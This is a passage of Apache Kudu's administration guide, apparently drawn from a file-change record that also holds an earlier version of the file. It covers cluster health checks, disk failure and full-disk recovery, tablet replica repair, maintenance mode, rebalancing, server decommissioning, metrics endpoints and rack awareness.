Status\n----------------------------------+------------------------+---------\n a598f75345834133a39c6e51163245db | tserver-01.example.com | HEALTHY\n e05ca6b6573b4e1f9a518157c0c0c637 | tserver-02.example.com | HEALTHY\n e7e53a91fe704296b3a59ad304e7444a | tserver-03.example.com | HEALTHY\n\nVersion Summary\n Version | Servers\n---------+-------------------------\n 1.7.1 | all 6 server(s) checked\n\nSummary by table\n Name | RF | Status | Total Tablets | Healthy | Recovering | Under-replicated | Unavailable\n----------+----+---------+---------------+---------+------------+------------------+-------------\n my_table | 3 | HEALTHY | 8 | 8 | 0 | 0 | 0\n\n | Total Count\n----------------+-------------\n Masters | 3\n Tablet Servers | 3\n Tables | 1\n Tablets | 8\n Replicas | 24\nOK\n----\n\nIf the cluster is unhealthy, for instance if a tablet server process has\nstopped, `ksck` will report the issue(s) and return a non-zero exit status, as\nshown in the abbreviated snippet of `ksck` output below:\n\n----\nTablet Server Summary\n UUID | Address | Status\n----------------------------------+------------------------+-------------\n a598f75345834133a39c6e51163245db | tserver-01.example.com | HEALTHY\n e05ca6b6573b4e1f9a518157c0c0c637 | tserver-02.example.com | HEALTHY\n e7e53a91fe704296b3a59ad304e7444a | tserver-03.example.com | UNAVAILABLE\nError from 127.0.0.1:7150: Network error: could not get status from server: Client connection negotiation failed: client connection to 127.0.0.1:7150: connect: Connection refused (error 61) (UNAVAILABLE)\n\n... (full output elided)\n\n==================\nErrors:\n==================\nNetwork error: error fetching info from tablet servers: failed to gather info for all tablet servers: 1 of 3 had errors\nCorruption: table consistency check error: 1 out of 1 table(s) are not healthy\n\nFAILED\nRuntime error: ksck discovered errors\n----\n\nTo verify data integrity, the optional `--checksum_scan` flag can be set, which\nwill ensure the cluster has consistent data by scanning each tablet replica and\ncomparing results. The `--tables` or `--tablets` flags can be used to limit the\nscope of the checksum scan to specific tables or tablets, respectively. For\nexample, checking data integrity on the `my_table` table can be done with the\nfollowing command:\n\n[source,bash]\n----\n$ sudo -u kudu kudu cluster ksck --checksum_scan --tables my_table master-01.example.com,master-02.example.com,master-03.example.com\n----\n\nBy default, `ksck` will attempt to use a snapshot scan of the table, so the\nchecksum scan can be done while writes continue.\n\nFinally, `ksck` also supports output in JSON format using the `--ksck_format`\nflag. JSON output contains the same information as the plain text output, but\nin a format that can be used by other tools. See `kudu cluster ksck --help` for\nmore information.\n\n[[change_dir_config]]\n=== Changing Directory Configurations\n\nFor higher read parallelism and larger volumes of storage per server, users may\nwant to configure servers to store data in multiple directories on different\ndevices. Once a server is started, users must go through the following steps\nto change the directory configuration.\n\nUsers can add or remove data directories to an existing master or tablet server\nvia the `kudu fs update_dirs` tool. Data is striped across data directories,\nand when a new data directory is added, new data will be striped across the\nunion of the old and new directories.\n\nNOTE: Unless the `--force` flag is specified, Kudu will not allow for the\nremoval of a directory across which tablets are configured to spread data. If\n`--force` is specified, all tablets configured to use that directory will fail\nupon starting up and be replicated elsewhere.\n\nNOTE: If the link:configuration.html#directory_configuration[metadata\ndirectory] overlaps with a data directory, as was the default prior to Kudu\n1.7, or if a non-default metadata directory is configured, the\n`--fs_metadata_dir` configuration must be specified when running the `kudu fs\nupdate_dirs` tool.\n\nNOTE: Only new tablet replicas (i.e. brand new tablets' replicas and replicas\nthat are copied to the server for high availability) will use the new\ndirectory. Existing tablet replicas on the server will not be rebalanced across\nthe new directory.\n\nWARNING: All of the command line steps below should be executed as the Kudu\nUNIX user, typically `kudu`.\n\n. The tool can only run while the server is offline, so establish a maintenance\n window to update the server. The tool itself runs quickly, so this offline\n window should be brief, and as such, only the server to update needs to be\n offline. However, if the server is offline for too long (see the\n `follower_unavailable_considered_failed_sec` flag), the tablet replicas on it\n may be evicted from their Raft groups. To avoid this, it may be desirable to\n bring the entire cluster offline while performing the update.\n\n. Run the tool with the desired directory configuration flags. For example, if a\n cluster was set up with `--fs_wal_dir=\/wals`, `--fs_metadata_dir=\/meta`, and\n `--fs_data_dirs=\/data\/1,\/data\/2,\/data\/3`, and `\/data\/3` is to be removed (e.g.\n due to a disk error), run the command:\n\n+\n[source,bash]\n----\n$ sudo -u kudu kudu fs update_dirs --force --fs_wal_dir=\/wals --fs_metadata_dir=\/meta --fs_data_dirs=\/data\/1,\/data\/2\n----\n+\n\n. Modify the values of the `fs_data_dirs` flags for the updated sever. If using\n CM, make sure to only update the configurations of the updated server, rather\n than of the entire Kudu service.\n\n. Once complete, the server process can be started. When Kudu is installed using\n system packages, `service` is typically used:\n\n+\n[source,bash]\n----\n$ sudo service kudu-tserver start\n----\n+\n\n\n[[disk_failure_recovery]]\n=== Recovering from Disk Failure\nKudu nodes can only survive failures of disks on which certain Kudu directories\nare mounted. For more information about the different Kudu directory types, see\nthe section on link:configuration.html#directory_configuration[Kudu Directory\nConfigurations]. Below describes this behavior across different Apache Kudu\nreleases.\n\n[[disk_failure_behavior]]\n.Kudu Disk Failure Behavior\n[cols=\"<,<,<\",options=\"header\"]\n|===\n| Node Type | Kudu Directory Type | Kudu Releases that Crash on Disk Failure\n| Master | All | All\n| Tablet Server | Directory containing WALs | All\n| Tablet Server | Directory containing tablet metadata | All\n| Tablet Server | Directory containing data blocks only | Pre-1.6.0\n|===\n\nWhen a disk failure occurs that does not lead to a crash, Kudu will stop using\nthe affected directory, shut down tablets with blocks on the affected\ndirectories, and automatically re-replicate the affected tablets to other\ntablet servers. The affected server will remain alive and print messages to the\nlog indicating the disk failure, for example:\n\n----\nE1205 19:06:24.163748 27115 data_dirs.cc:1011] Directory \/data\/8\/kudu\/data marked as failed\nE1205 19:06:30.324795 27064 log_block_manager.cc:1822] Not using report from \/data\/8\/kudu\/data: IO error: Could not open container 0a6283cab82d4e75848f49772d2638fe: \/data\/8\/kudu\/data\/0a6283cab82d4e75848f49772d2638fe.metadata: Read-only file system (error 30)\nE1205 19:06:33.564638 27220 ts_tablet_manager.cc:946] T 4957808439314e0d97795c1394348d80 P 70f7ee61ead54b1885d819f354eb3405: aborting tablet bootstrap: tablet has data in a failed directory\n----\n\nWhile in this state, the affected node will avoid using the failed disk,\nleading to lower storage volume and reduced read parallelism. The administrator\nshould schedule a brief window to <<change_dir_config,update the node's\ndirectory configuration>> to exclude the failed disk.\n\nWhen the disk is repaired, remounted, and ready to be reused by Kudu, take the\nfollowing steps:\n\n. Make sure that the Kudu portion of the disk is completely empty.\n. Stop the tablet server.\n. Run the `update_dirs` tool. For example, to add `\/data\/3`, run the following:\n+\n[source,bash]\n----\n$ sudo -u kudu kudu fs update_dirs --force --fs_wal_dir=\/wals --fs_data_dirs=\/data\/1,\/data\/2,\/data\/3\n----\n+\n\n. Start the tablet server.\n. Run `ksck` to verify cluster health.\n+\n[source,bash]\n----\nsudo -u kudu kudu cluster ksck master-01.example.com\n----\n+\n\n\nNote that existing tablets will not stripe to the restored disk, but any new tablets\nwill stripe to the restored disk.\n\n[[disk_full_recovery]]\n=== Recovering from Full Disks\nBy default, Kudu reserves a small amount of space (1% by capacity) in its\ndirectories; Kudu considers a disk full if there is less free space available\nthan the reservation. Kudu nodes can only tolerate running out of space on disks\non which certain Kudu directories are mounted. For more information about the\ndifferent Kudu directory types, see\nlink:configuration.html#directory_configuration[Kudu Directory Configurations].\nThe table below describes this behavior for each type of directory. The behavior\nis uniform across masters and tablet servers.\n[[disk_full_behavior]]\n.Kudu Full Disk Behavior\n[options=\"header\"]\n|===\n| Kudu Directory Type | Crash on a Full Disk?\n| Directory containing WALs | Yes\n| Directory containing tablet metadata | Yes\n| Directory containing data blocks only | No (see below)\n|===\n\nPrior to Kudu 1.7.0, Kudu stripes tablet data across all directories, and will\navoid writing data to full directories. Kudu will crash if all data directories\nare full.\n\nIn 1.7.0 and later, new tablets are assigned a disk group consisting of\n-fs_target_data_dirs_per_tablet data dirs (default 3). If Kudu is not configured\nwith enough data directories for a full disk group, all data directories are\nused. When a data directory is full, Kudu will stop writing new data to it and\neach tablet that uses that data directory will write new data to other data\ndirectories within its group. If all data directories for a tablet are full, Kudu\nwill crash. Periodically, Kudu will check if full data directories are still\nfull, and will resume writing to those data directories if space has become\navailable.\n\nIf Kudu does crash because its data directories are full, freeing space on the\nfull directories will allow the affected daemon to restart and resume writing.\nNote that it may be possible for Kudu to free some space by running\n\n[source,bash]\n----\n$ sudo -u kudu kudu fs check --repair\n----\n\nbut this command may also fail if there is too little space left.\n\nIt's also possible to allocate additional data directories to Kudu in order to\nincrease the overall amount of storage available. See the documentation on\n<<change_dir_config,updating a node's directory configuration>> for more\ninformation. Note that existing tablets will not use new data directories, so\nadding a new data directory does not resolve issues with full disks.\n\n[[tablet_majority_down_recovery]]\n=== Bringing a tablet that has lost a majority of replicas back online\n\nIf a tablet has permanently lost a majority of its replicas, it cannot recover\nautomatically and operator intervention is required. If the tablet servers\nhosting a majority of the replicas are down (i.e. ones reported as \"TS\nunavailable\" by ksck), they should be recovered instead if possible.\n\nWARNING: The steps below may cause recent edits to the tablet to be lost,\npotentially resulting in permanent data loss. Only attempt the procedure below\nif it is impossible to bring a majority back online.\n\nSuppose a tablet has lost a majority of its replicas. The first step in\ndiagnosing and fixing the problem is to examine the tablet's state using ksck:\n\n[source,bash]\n----\n$ sudo -u kudu kudu cluster ksck --tablets=e822cab6c0584bc0858219d1539a17e6 master-00,master-01,master-02\nConnected to the Master\nFetched info from all 5 Tablet Servers\nTablet e822cab6c0584bc0858219d1539a17e6 of table 'my_table' is unavailable: 2 replica(s) not RUNNING\n 638a20403e3e4ae3b55d4d07d920e6de (tserver-00:7150): RUNNING\n 9a56fa85a38a4edc99c6229cba68aeaa (tserver-01:7150): bad state\n State: FAILED\n Data state: TABLET_DATA_READY\n Last status: <failure message>\n c311fef7708a4cf9bb11a3e4cbcaab8c (tserver-02:7150): bad state\n State: FAILED\n Data state: TABLET_DATA_READY\n Last status: <failure message>\n----\n\nThis output shows that, for tablet `e822cab6c0584bc0858219d1539a17e6`, the two\ntablet replicas on `tserver-01` and `tserver-02` failed. The remaining replica\nis not the leader, so the leader replica failed as well. This means the chance\nof data loss is higher since the remaining replica on `tserver-00` may have\nbeen lagging. In general, to accept the potential data loss and restore the\ntablet from the remaining replicas, divide the tablet replicas into two groups:\n\n1. Healthy replicas: Those in `RUNNING` state as reported by ksck\n2. Unhealthy replicas\n\nFor example, in the above ksck output, the replica on tablet server `tserver-00`\nis healthy, while the replicas on `tserver-01` and `tserver-02` are unhealthy.\nOn each tablet server with a healthy replica, alter the consensus configuration\nto remove unhealthy replicas. In the typical case of 1 out of 3 surviving\nreplicas, there will be only one healthy replica, so the consensus configuration\nwill be rewritten to include only the healthy replica.\n\n[source,bash]\n----\n$ sudo -u kudu kudu remote_replica unsafe_change_config tserver-00:7150 <tablet-id> <tserver-00-uuid>\n----\n\nwhere `<tablet-id>` is `e822cab6c0584bc0858219d1539a17e6` and\n`<tserver-00-uuid>` is the uuid of `tserver-00`,\n`638a20403e3e4ae3b55d4d07d920e6de`.\n\nOnce the healthy replicas' consensus configurations have been forced to exclude\nthe unhealthy replicas, the healthy replicas will be able to elect a leader.\nThe tablet will become available for writes, though it will still be\nunder-replicated. Shortly after the tablet becomes available, the leader master\nwill notice that it is under-replicated, and will cause the tablet to\nre-replicate until the proper replication factor is restored. The unhealthy\nreplicas will be tombstoned by the master, causing their remaining data to be\ndeleted.\n\n[[rebuilding_kudu]]\n=== Rebuilding a Kudu Filesystem Layout\n\nIn the event that critical files are lost, i.e. WALs or tablet-specific\nmetadata, all Kudu directories on the server must be deleted and rebuilt to\nensure correctness. Doing so will destroy the copy of the data for each tablet\nreplica hosted on the local server. Kudu will automatically re-replicate tablet\nreplicas removed in this way, provided the replication factor is at least three\nand all other servers are online and healthy.\n\nNOTE: These steps use a tablet server as an example, but the steps are the same\nfor Kudu master servers.\n\nWARNING: If multiple nodes need their FS layouts rebuilt, wait until all\nreplicas previously hosted on each node have finished automatically\nre-replicating elsewhere before continuing. Failure to do so can result in\npermanent data loss.\n\nWARNING: Before proceeding, ensure the contents of the directories are backed\nup, either as a copy or in the form of other tablet replicas.\n\n. The first step to rebuilding a server with a new directory configuration is\n emptying all of the server's existing directories. For example, if a tablet\n server is configured with `--fs_wal_dir=\/data\/0\/kudu-tserver-wal`,\n `--fs_metadata_dir=\/data\/0\/kudu-tserver-meta`, and\n `--fs_data_dirs=\/data\/1\/kudu-tserver,\/data\/2\/kudu-tserver`, the following\n commands will remove the WAL directory's and data directories' contents:\n\n+\n[source,bash]\n----\n# Note: this will delete all of the data from the local tablet server.\n$ rm -rf \/data\/0\/kudu-tserver-wal\/* \/data\/0\/kudu-tserver-meta\/* \/data\/1\/kudu-tserver\/* \/data\/2\/kudu-tserver\/*\n----\n+\n\n. If using CM, update the configurations for the rebuilt server to include only\n the desired directories. Make sure to only update the configurations of servers\n to which changes were applied, rather than of the entire Kudu service.\n\n. After directories are deleted, the server process can be started with the new\n directory configuration. The appropriate sub-directories will be created by\n Kudu upon starting up.\n\n[[minimizing_cluster_disruption_during_temporary_single_ts_downtime]]\n=== Minimizing cluster disruption during temporary planned downtime of a single tablet server\n\nIf a single tablet server is brought down temporarily in a healthy cluster, all\ntablets will remain available and clients will function as normal, after\npotential short delays due to leader elections. However, if the downtime lasts\nfor more than `--follower_unavailable_considered_failed_sec` (default 300)\nseconds, the tablet replicas on the down tablet server will be replaced by new\nreplicas on available tablet servers. This will cause stress on the cluster\nas tablets re-replicate and, if the downtime lasts long enough, significant\nreduction in the number of replicas on the down tablet server, which would\nrequire the rebalancer to fix.\n\nTo work around this, in Kudu versions from 1.11 onwards, the `kudu` CLI\ncontains a tool to put tablet servers into maintenance mode. While in this\nstate, the tablet server\u2019s replicas are not re-replicated due to its downtime\nalone, though re-replication may still occur in the event that the server in\nmaintenance suffers from a disk failure or if a follower replica on the tablet\nserver falls too far behind its leader replica. Upon exiting maintenance,\nre-replication is triggered for any remaining under-replicated tablets.\n\nThe `kudu tserver state enter_maintenance` and `kudu tserver state\nexit_maintenance` tools are added to orchestrate tablet server maintenance.\nThe following can be run from a tablet server to put it into maintenance:\n\n[source,bash]\n----\n$ TS_UUID=$(sudo -u kudu kudu fs dump uuid --fs_wal_dir=<wal_dir> --fs_data_dirs=<data_dirs>)\n$ sudo -u kudu kudu tserver state enter_maintenance <master_addresses> \"$TS_UUID\"\n----\n\nThe tablet server maintenance mode is shown in the \"Tablet Servers\" page of the\nKudu leader master's web UI, and in the output of `kudu cluster ksck`. To exit\nmaintenance mode, run the following:\n\n[source,bash]\n----\n$ sudo -u kudu kudu tserver state exit_maintenance <master_addresses> \"$TS_UUID\"\n----\n\nIn versions prior to 1.11, a different approach must be used to prevent\nunwanted re-replication. Increase\n`--follower_unavailable_considered_failed_sec` on all tablet servers so the\namount of time before re-replication starts is longer than the expected\ndowntime of the tablet server, including the time it takes the tablet server to\nrestart and bootstrap its tablet replicas. To do this, run the following\ncommand for each tablet server:\n\n[source,bash]\n----\n$ sudo -u kudu kudu tserver set_flag <tserver_address> follower_unavailable_considered_failed_sec <num_seconds>\n----\n\nwhere `<num_seconds>` is the number of seconds that will encompass the downtime.\nOnce the downtime is finished, reset the flag to its original value.\n\n----\n$ sudo -u kudu kudu tserver set_flag <tserver_address> follower_unavailable_considered_failed_sec <original_value>\n----\n\nWARNING: Be sure to reset the value of `--follower_unavailable_considered_failed_sec`\nto its original value.\n\nNOTE: On Kudu versions prior to 1.8, the `--force` flag must be provided in the above\n`set_flag` commands.\n\n[[rebalancer_tool]]\n=== Running the tablet rebalancing tool\n\nThe `kudu` CLI contains a rebalancing tool that can be used to rebalance\ntablet replicas among tablet servers. For each table, the tool attempts to\nbalance the number of replicas per tablet server. It will also, without\nunbalancing any table, attempt to even out the number of replicas per tablet\nserver across the cluster as a whole. The rebalancing tool should be run as the\nKudu admin user, specifying all master addresses:\n\n[source,bash]\n----\nsudo -u kudu kudu cluster rebalance master-01.example.com,master-02.example.com,master-03.example.com\n----\n\nWhen run, the rebalancer will report on the initial tablet replica distribution\nin the cluster, log the replicas it moves, and print a final summary of the\ndistribution when it terminates:\n\n----\nPer-server replica distribution summary:\n Statistic | Value\n-----------------------+-----------\n Minimum Replica Count | 0\n Maximum Replica Count | 24\n Average Replica Count | 14.400000\n\nPer-table replica distribution summary:\n Replica Skew | Value\n--------------+----------\n Minimum | 8\n Maximum | 8\n Average | 8.000000\n\nI0613 14:18:49.905897 3002065792 rebalancer.cc:779] tablet e7ee9ade95b342a7a94649b7862b345d: 206a51de1486402bbb214b5ce97a633c -> 3b4d9266ac8c45ff9a5d4d7c3e1cb326 move scheduled\nI0613 14:18:49.917578 3002065792 rebalancer.cc:779] tablet 5f03944529f44626a0d6ec8b1edc566e: 6e64c4165b864cbab0e67ccd82091d60 -> ba8c22ab030346b4baa289d6d11d0809 move scheduled\nI0613 14:18:49.928683 3002065792 rebalancer.cc:779] tablet 9373fee3bfe74cec9054737371a3b15d: fab382adf72c480984c6cc868fdd5f0e -> 3b4d9266ac8c45ff9a5d4d7c3e1cb326 move scheduled\n\n... (full output elided)\n\nI0613 14:19:01.162802 3002065792 rebalancer.cc:842] tablet f4c046f18b174cc2974c65ac0bf52767: 206a51de1486402bbb214b5ce97a633c -> 3b4d9266ac8c45ff9a5d4d7c3e1cb326 move completed: OK\n\nrebalancing is complete: cluster is balanced (moved 28 replicas)\nPer-server replica distribution summary:\n Statistic | Value\n-----------------------+-----------\n Minimum Replica Count | 14\n Maximum Replica Count | 15\n Average Replica Count | 14.400000\n\nPer-table replica distribution summary:\n Replica Skew | Value\n--------------+----------\n Minimum | 1\n Maximum | 1\n Average | 1.000000\n----\n\nIf more details are needed in addition to the replica distribution summary,\nuse the `--output_replica_distribution_details` flag. If added, the flag makes\nthe tool print per-table and per-tablet server replica distribution statistics\nas well.\n\nUse the `--report_only` flag to get a report on table- and cluster-wide\nreplica distribution statistics without starting any rebalancing activity.\n\nThe rebalancer can also be restricted to run on a subset of the tables by\nsupplying the `--tables` flag. Note that, when running on a subset of tables,\nthe tool will not attempt to balance the cluster as a whole.\n\nThe length of time rebalancing is run for can be controlled with the flag\n`--max_run_time_sec`. By default, the rebalancer will run until the cluster is\nbalanced. To control the amount of resources devoted to rebalancing, modify\nthe flag `--max_moves_per_server`. See `kudu cluster rebalance --help` for more.\n\nIt's safe to stop the rebalancer tool at any time. When restarted, the\nrebalancer will continue rebalancing the cluster.\n\nThe rebalancer requires all registered tablet servers to be up and running\nto proceed with the rebalancing process. That's to avoid possible conflicts\nand races with the automatic re-replication and keep replica placement optimal\nfor current configuration of the cluster. If a tablet server becomes\nunavailable during the rebalancing session, the rebalancer will exit. As noted\nabove, it's safe to restart the rebalancer after resolving the issue with\nunavailable tablet servers.\n\nThe rebalancing tool can rebalance Kudu clusters running older versions as well,\nwith some restrictions. Consult the following table for more information. In the\ntable, \"RF\" stands for \"replication factor\".\n\n[[rebalancer_compatibility]]\n.Kudu Rebalancing Tool Compatibility\n[options=\"header\"]\n|===\n| Version Range | Rebalances RF = 1 Tables? | Rebalances RF > 1 Tables?\n| v < 1.4.0 | No | No\n| 1.4.0 +<=+ v < 1.7.1 | No | Yes\n| v >= 1.7.1 | Yes | Yes\n|===\n\nIf the rebalancer is running against a cluster where rebalancing replication\nfactor one tables is not supported, it will rebalance all the other tables\nand the cluster as if those singly-replicated tables did not exist.\n\n[[rebalancer_tool_with_rack_awareness]]\n=== Running the tablet rebalancing tool on a rack-aware cluster\n\nAs detailed in the <<rack_awareness, rack awareness>> section, it's possible\nto use the `kudu cluster rebalance` tool to establish the placement policy on a\ncluster. This might be necessary when the rack awareness feature is first\nconfigured or when re-replication violated the placement policy. The rebalancing\ntool breaks its work into three phases:\n\n. The rack-aware rebalancer tries to establish the placement policy. Use the\n `--disable_policy_fixer` flag to skip this phase.\n. The rebalancer tries to balance load by location, moving tablet replicas\n between locations in an attempt to spread tablet replicas among locations\n evenly. The load of a location is measured as the total number of replicas in\n the location divided by the number of tablet servers in the location. Use the\n `--disable_cross_location_rebalancing` flag to skip this phase.\n. The rebalancer tries to balance the tablet replica distribution within each\n location, as if the location were a cluster on its own. Use the\n `--disable_intra_location_rebalancing` flag to skip this phase.\n\nBy using the `--report_only` flag, it's also possible to check if all tablets in\nthe cluster conform to the placement policy without attempting any replica\nmovement.\n\n[[tablet_server_decommissioning]]\n=== Decommissioning or Permanently Removing a Tablet Server From a Cluster\n\nKudu does not currently have an automated way to remove a tablet server from\na cluster permanently. Instead, use the following steps:\n\n. Ensure the cluster is in good health using `ksck`. See <<ksck>>.\n. If the tablet server contains any replicas of tables with replication factor\n 1, these replicas must be manually moved off the tablet server prior to\n shutting it down. The `kudu tablet change_config move_replica` tool can be\n used for this.\n. Shut down the tablet server. After\n `-follower_unavailable_considered_failed_sec`, which defaults to 5 minutes,\n Kudu will begin to re-replicate the tablet server's replicas to other servers.\n Wait until the process is finished. Progress can be monitored using `ksck`.\n. Once all the copies are complete, `ksck` will continue to report the tablet\n server as unavailable. The cluster will otherwise operate fine without the\n tablet server. To completely remove it from the cluster so `ksck` shows the\n cluster as completely healthy, restart the masters. In the case of a single\n master, this will cause cluster downtime. With multi-master, restart the\n masters in sequence to avoid cluster downtime.\n\nWARNING: Do not shut down multiple tablet servers at once. To remove multiple\ntablet servers from the cluster, follow the above instructions for each tablet\nserver, ensuring that the previous tablet server is removed from the cluster and\n`ksck` is healthy before shutting down the next.\n\n[[using_cluster_names_in_kudu_tool]]\n=== Using cluster names in the `kudu` command line tool\n\nWhen using the `kudu` command line tool, it can be difficult to remember the\nprecise list of Kudu master RPC addresses needed to communicate with a cluster,\nespecially when managing multiple clusters. As an alternative, the command line\ntool can identify clusters by name. To use this functionality:\n\n. Create a new directory to store the Kudu configuration file.\n. Export the path to this directory in the `KUDU_CONFIG` environment variable.\n. Create a file called `kudurc` in the new directory.\n. Populate `kudurc` as follows, substituting your own cluster names and RPC\n addresses:\n+\n----\nclusters_info:\n cluster_name1:\n master_addresses: ip1:port1,ip2:port2,ip3:port3\n cluster_name2:\n master_addresses: ip4:port4\n----\n+\n. When using the `kudu` command line tool, replace the list of Kudu master RPC\n addresses with the cluster name, prepended with the character `@`.\n\n Example::\n+\n----\n$ sudo -u kudu kudu ksck @cluster_name1\n----\n+\n\n\nNOTE: Cluster names may be used as input in any invocation of the `kudu` command\nline tool that expects a list of Kudu master RPC addresses.\n","old_contents":"\/\/ Licensed to the Apache Software Foundation (ASF) under one\n\/\/ or more contributor license agreements. See the NOTICE file\n\/\/ distributed with this work for additional information\n\/\/ regarding copyright ownership. The ASF licenses this file\n\/\/ to you under the Apache License, Version 2.0 (the\n\/\/ \"License\"); you may not use this file except in compliance\n\/\/ with the License. You may obtain a copy of the License at\n\/\/\n\/\/ http:\/\/www.apache.org\/licenses\/LICENSE-2.0\n\/\/\n\/\/ Unless required by applicable law or agreed to in writing,\n\/\/ software distributed under the License is distributed on an\n\/\/ \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n\/\/ KIND, either express or implied. See the License for the\n\/\/ specific language governing permissions and limitations\n\/\/ under the License.\n\n[[administration]]\n= Apache Kudu Administration\n\n:author: Kudu Team\n:imagesdir: .\/images\n:icons: font\n:toc: left\n:toclevels: 3\n:doctype: book\n:backend: html5\n:sectlinks:\n:experimental:\n\n== Starting and Stopping Kudu Processes\n\nNOTE: These instructions are relevant only when Kudu is installed using operating system packages\n(e.g. `rpm` or `deb`).\n\ninclude::installation.adoc[tags=start_stop]\n\n== Kudu Web Interfaces\n\nKudu tablet servers and masters expose useful operational information on a built-in web interface,\n\n=== Kudu Master Web Interface\n\nKudu master processes serve their web interface on port 8051. The interface exposes several pages\nwith information about the cluster state:\n\n- A list of tablet servers, their host names, and the time of their last heartbeat.\n- A list of tables, including schema and tablet location information for each.\n- SQL code which you can paste into Impala Shell to add an existing table to Impala's list of known data sources.\n\n=== Kudu Tablet Server Web Interface\n\nEach tablet server serves a web interface on port 8050. The interface exposes information\nabout each tablet hosted on the server, its current state, and debugging information\nabout maintenance background operations.\n\n=== Common Web Interface Pages\n\nBoth Kudu masters and tablet servers expose a common set of information via their web interfaces:\n\n- HTTP access to server logs.\n- an `\/rpcz` endpoint which lists currently running RPCs via JSON.\n- pages giving an overview and detailed information on the memory usage of different\n components of the process.\n- information on the current set of configuration flags.\n- information on the currently running threads and their resource consumption.\n- a JSON endpoint exposing metrics about the server.\n- information on the deployed version number of the daemon.\n\nThese interfaces are linked from the landing page of each daemon's web UI.\n\n== Kudu Metrics\n\nKudu daemons expose a large number of metrics. Some metrics are associated with an entire\nserver process, whereas others are associated with a particular tablet replica.\n\n=== Listing available metrics\n\nThe full set of available metrics for a Kudu server can be dumped via a special command\nline flag:\n\n[source,bash]\n----\n$ kudu-tserver --dump_metrics_json\n$ kudu-master --dump_metrics_json\n----\n\nThis will output a large JSON document. Each metric indicates its name, label, description,\nunits, and type. Because the output is JSON-formatted, this information can easily be\nparsed and fed into other tooling which collects metrics from Kudu servers.\n\n=== Collecting metrics via HTTP\n\nMetrics can be collected from a server process via its HTTP interface by visiting\n`\/metrics`. The output of this page is JSON for easy parsing by monitoring services.\nThis endpoint accepts several `GET` parameters in its query string:\n\n- `\/metrics?metrics=<substring1>,<substring2>,...` - limits the returned metrics to those which contain\nat least one of the provided substrings. The substrings also match entity names, so this\nmay be used to collect metrics for a specific tablet.\n\n- `\/metrics?include_schema=1` - includes metrics schema information such as unit, description,\nand label in the JSON output. This information is typically elided to save space.\n\n- `\/metrics?compact=1` - eliminates unnecessary whitespace from the resulting JSON, which can decrease\nbandwidth when fetching this page from a remote host.\n\n- `\/metrics?include_raw_histograms=1` - include the raw buckets and values for histogram metrics,\nenabling accurate aggregation of percentile metrics over time and across hosts.\n\n- `\/metrics?level=info` - limits the returned metrics based on their severity level.\nThe levels are ordered and lower levels include the levels above them. If no level is specified,\n`debug` is used to include all metrics. The valid values are:\n * `debug` - Metrics that are diagnostically helpful but generally not monitored\n during normal operation.\n * `info` - Generally useful metrics that operators always want to have available\n but may not be monitored under normal circumstances.\n * `warn` - Metrics which can often indicate operational oddities, which may need more investigation.\n\nFor example:\n\n[source,bash]\n----\n$ curl -s 'http:\/\/example-ts:8050\/metrics?include_schema=1&metrics=connections_accepted'\n----\n\n[source,json]\n----\n[\n {\n \"type\": \"server\",\n \"id\": \"kudu.tabletserver\",\n \"attributes\": {},\n \"metrics\": [\n {\n \"name\": \"rpc_connections_accepted\",\n \"label\": \"RPC Connections Accepted\",\n \"type\": \"counter\",\n \"unit\": \"connections\",\n \"description\": \"Number of incoming TCP connections made to the RPC server\",\n \"value\": 92\n }\n ]\n }\n]\n----\n\n[source,bash]\n----\n$ curl -s 'http:\/\/example-ts:8050\/metrics?metrics=log_append_latency'\n----\n\n[source,json]\n----\n[\n {\n \"type\": \"tablet\",\n \"id\": \"c0ebf9fef1b847e2a83c7bd35c2056b1\",\n \"attributes\": {\n \"table_name\": \"lineitem\",\n \"partition\": \"hash buckets: (55), range: [(<start>), (<end>))\",\n \"table_id\": \"\"\n },\n \"metrics\": [\n {\n \"name\": \"log_append_latency\",\n \"total_count\": 7498,\n \"min\": 4,\n \"mean\": 69.3649,\n \"percentile_75\": 29,\n \"percentile_95\": 38,\n \"percentile_99\": 45,\n \"percentile_99_9\": 95,\n \"percentile_99_99\": 167,\n \"max\": 367244,\n \"total_sum\": 520098\n }\n ]\n }\n]\n----\n\nNOTE: All histograms and counters are measured since the server start time, and are not reset upon collection.\n\n=== Diagnostics Logging\n\nKudu may be configured to dump various diagnostics information to a local log file.\nThe diagnostics log will be written to the same directory as the other Kudu log files, with a\nsimilar naming format, substituting `diagnostics` instead of a log level like `INFO`.\nAfter any diagnostics log file reaches 64MB uncompressed, the log will be rolled and\nthe previous file will be gzip-compressed.\n\nEach line in the diagnostics log consists of the following components:\n\n* A human-readable timestamp formatted in the same fashion as the other Kudu log files.\n* The type of record. For example, a metrics record consists of the word `metrics`.\n* A machine-readable timestamp, in microseconds since the Unix epoch.\n* The record itself.\n\nCurrently, the only type of diagnostics record is a periodic dump of the server metrics.\nEach record is encoded in compact JSON format, and the server attempts to elide any metrics\nwhich have not changed since the previous record. In addition, counters which have never\nbeen incremented are elided. Otherwise, the format of the JSON record is identical to the\nformat exposed by the HTTP endpoint above.\n\nThe frequency with which metrics are dumped to the diagnostics log is configured using the\n`--metrics_log_interval_ms` flag. By default, Kudu logs metrics every 60 seconds.\n\n[[rack_awareness]]\n== Rack Awareness\n\nAs of version 1.9, Kudu supports a rack awareness feature. Kudu's ordinary\nre-replication methods ensure the availability of the cluster in the event of a\nsingle node failure. However, clusters can be vulnerable to correlated failures\nof multiple nodes. For example, all of the physical hosts on the same rack in\na datacenter may become unavailable simultaneously if the top-of-rack switch\nfails. Kudu's rack awareness feature provides protection from some kinds of\ncorrelated failures, like the failure of a single rack in a datacenter.\n\nThe first element of Kudu's rack awareness feature is location assignment. When\na tablet server or client registers with a master, the master assigns it a\nlocation. A location is a `\/`-separated string that begins with a `\/` and where\neach `\/`-separated component consists of characters from the set\n`[a-zA-Z0-9_-.]`. For example, `\/dc-0\/rack-09` is a valid location, while\n`rack-04` and `\/rack=1` are not valid locations. Thus location strings resemble\nabsolute UNIX file paths where characters in directory and file names are\nrestricted to the set `[a-zA-Z0-9_-.]`. Presently, Kudu does not use the\nhierarchical structure of locations, but it may in the future. Location\nassignment is done by a user-provided command, whose path should be specified\nusing the `--location_mapping_cmd` master flag. The command should take a single\nargument, the IP address or hostname of a tablet server or client, and return\nthe location for the tablet server or client. Make sure that all Kudu masters\nare using the same location mapping command.\n\nThe second element of Kudu's rack awareness feature is the placement policy,\nwhich is\n\n Do not place a majority of replicas of a tablet on tablet servers in the same location.\n\nThe leader master, when placing newly created replicas on tablet servers and\nwhen re-replicating existing tablets, will attempt to 